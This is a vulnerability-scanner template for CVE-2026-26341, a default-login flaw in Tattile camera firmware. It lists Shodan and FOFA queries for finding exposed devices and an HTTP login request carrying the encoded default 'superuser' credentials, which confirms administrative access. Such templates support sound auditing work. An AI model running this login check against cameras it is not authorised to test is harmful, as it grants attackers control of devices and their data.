id: CVE-2026-26341

info:
  name: Tattile Camera < 1.181.5 - Default Login
  author: 0x_Akoko
  severity: high
  description: |
   Tattile Smart+, Vega, and Basic device families firmware <= 1.181.5 contain a broken authentication caused by default credentials not forced to be changed, letting attackers with management interface access gain administrative privileges.
  impact: |
   Attackers can gain administrative access to device configuration and data, leading to unauthorized control and data exposure.
  remediation: |
   Update firmware to a version later than 1.181.5 or the latest available version.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2026-26341
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.3
    cve-id: CVE-2026-26341
    epss-score: 0.08914
    epss-percentile: 0.92719
    cwe-id: CWE-1392
    cpe: cpe:2.3:o:tattile:smart\+_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"Tattile camera manager"
    fofa-query: icon_hash=="2030104257"
  tags: cve,cve2026,tattile,default-login,camera,iot

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "Tattile camera manager")
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v1/security/login HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic c3VwZXJ1c2VyOnN1cGVydXNlcg==

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "text/plain")
          - regex("^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$", body)
        condition: and
# digest: 490a0046304402203ee1aca5dc0d65919cddc1285d21dcf3d846d6db4a2f70311859f9cee843f12202202473ceefbda5b99665c0dedd1721effbb36d17ea800f212b6e51270fd5930ba3:922c64590222798bb761d5b6d8e72950